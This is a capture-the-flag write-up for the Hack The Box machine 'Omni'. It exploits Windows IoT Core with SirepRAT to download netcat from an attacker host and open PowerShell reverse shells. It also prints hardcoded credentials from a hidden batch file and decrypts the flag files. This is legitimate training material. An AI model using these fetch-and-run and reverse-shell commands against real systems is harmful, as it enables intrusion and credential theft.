OMNI

NMAP:

Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-24 11:07 EST
Nmap scan report for 10.10.10.204
Host is up (0.34s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8080/tcp open upnp Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.94 seconds

So, ports 135 and 8080 are open.
On port 135 Microsoft Windows RPC is running. This protocol provides transparent
communication so that clients can talk directly to servers.
On port 8080 a web server is running, and the nmap scan returns its
http-server-header: Microsoft-HTTPAPI/2.0. The basic auth realm tells us it is
the Windows Device Portal.
Looks like this is a Windows IoT Core device....
After some searching I found that this version of IoT Core can be exploited using
SirepRAT.

WEBSITE:

The web server asks me for creds to log in. I tried some default creds, but
nothing worked there.
As I said above, I'm going to use the SirepRAT tool to gain a shell.
Here is the SirepRAT exploit:

https://github.com/SafeBreach-Labs/SirepRAT

All the commands are in the readme file... go through it...
I'm going to try that one and pop a shell.
pip install -r requirements.txt
Run this first so all the requirements are satisfied :)
If you still get errors, then try this:
pip2 install enum34

So here is my command

┌──(root💀Mywife)-[/home/…/htb/boxes/omni/SirepRAT]
└─# python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell Invoke-Webrequest -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe -Uri http://10.10.14.24:8080/nc64.exe" --v
---------
---------

And in my python server

┌──(kali㉿Mywife)-[~/Exploits/nc]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.204 - - [24/Dec/2020 12:52:10] "GET /nc64.exe HTTP/1.1" 200 -

My exploit worked, so now I'm going to execute it.... :)

┌──(root💀Mywife)-[/home/…/htb/boxes/omni/SirepRAT]
└─# python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c cd C:\Windows\System32\spool\drivers\color && nc64.exe 10.10.14.24 1234 -e powershell.exe" --v
---------
---------

And I got a shell in my netcat listener

┌──(kali㉿Mywife)-[~/Documents/nc.exe]
└─$ nc -lvvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.158] from (UNKNOWN) [10.10.10.204] 49674
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\windows\system32>

It looks like we can see user.txt, but it's encrypted.
We only got a shell as $omni, so we need to privesc to another user to decrypt
it...........
After some enumeration I found a hidden file, r.bat,
located in:

PS C:\Program Files\WindowsPowerShell\Modules\PackageManagement> gci -hidden
gci -hidden
Directory: C:\Program Files\WindowsPowerShell\Modules\PackageManagement
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a-h--         8/21/2020 12:56 PM            247 r.bat


PS C:\Program Files\WindowsPowerShell\Modules\PackageManagement> type r.bat
type r.bat
@echo off
:LOOP
for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete
net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz
ping -n 3 127.0.0.1
cls
GOTO :LOOP
:EXIT

USER PART:

I’m in 😀

After some enumeration here I found a place to run commands :)
After running this command there, I got a shell as app in my nc:

cd C:\Windows\System32\spool\drivers\color && nc64.exe 10.10.14.77 5555 -e powershell.exe

┌──(kali㉿Mywife)-[~]
└─$ nc -lvvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.77] from (UNKNOWN) [10.10.10.204] 49674
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32\spool\drivers\color> $env:username
$env:username
app

We know that user.txt and root.txt are encrypted, so we need to decrypt them.
Use these commands:

$credential = Import-CliXml -Path U:\Users\app\user.txt
$credential.GetNetworkCredential().Password

PS C:\Windows\system32\spool\drivers\color> $credential = Import-CliXml -Path U:\Users\app\user.txt
$credential = Import-CliXml -Path U:\Users\app\user.txt
PS C:\Windows\system32\spool\drivers\color> $credential.GetNetworkCredential().Password
$credential.GetNetworkCredential().Password

7cfd1505ad9d70
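The reason a shell as the right user is needed before user.txt (and later root.txt) can be read: Export-CliXml protects a PSCredential's password with DPAPI in the current-user scope, so the file only round-trips for the account that created it. The following is an added example, not from the original writeup, using a constructed credential and a temp path rather than the box's files:

```powershell
# Added example: PSCredential round-trip through Export-CliXml / Import-CliXml.
# Sample value and file path are constructed for this demo, not the box's flag.
$plain  = 'example-flag-value'
$secure = ConvertTo-SecureString $plain -AsPlainText -Force
$cred   = New-Object System.Management.Automation.PSCredential('flag', $secure)

$path = Join-Path $env:TEMP 'flag-demo.xml'
$cred | Export-CliXml -Path $path

# On disk the password is a DPAPI blob (long hex string), not plaintext,
# which is why the writeup calls user.txt / root.txt "encrypted".
$line = (Get-Content $path) -match '<SS N="Password">' | Select-Object -First 1
$line.Substring(0, [Math]::Min(80, $line.Length))

# Same user on the same machine: Import-CliXml rebuilds the PSCredential and
# GetNetworkCredential() exposes the plaintext, exactly as in the writeup.
$imported = Import-CliXml -Path $path
$imported.GetNetworkCredential().Password

# Any other account importing the same file gets a DPAPI failure on import
# (commonly "Key not valid for use in specified state"), so a shell as app
# is required for user.txt and as administrator for root.txt.
Remove-Item $path
```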

Root part:
Same steps for root: we just need to log in as administrator on that web
portal and follow the same steps we used to get user.txt.
First I'm going to log in...

It says it failed to run the command, but I've got a shell as administrator in my
nc.
I'm going to run these commands to decrypt root.txt:
$credential = Import-CliXml -Path U:\Users\administrator\root.txt
$credential.GetNetworkCredential().Password

┌──(kali㉿Mywife)-[~]
└─$ nc -lvvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.77] from (UNKNOWN) [10.10.10.204] 49681
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32\spool\drivers\color> $env:username
$env:username
Administrator
PS C:\Windows\system32\spool\drivers\color> $credential = Import-CliXml -Path U:\Users\administrator\root.txt
$credential = Import-CliXml -Path U:\Users\administrator\root.txt
PS C:\Windows\system32\spool\drivers\color> $credential.GetNetworkCredential().Password
$credential.GetNetworkCredential().Password

5dbdc6e9bf11d2321dca21

That's all, we've rooted it!!!

Hope you liked my writeup; follow this blog for more cool writeups.

See you soon Bye.
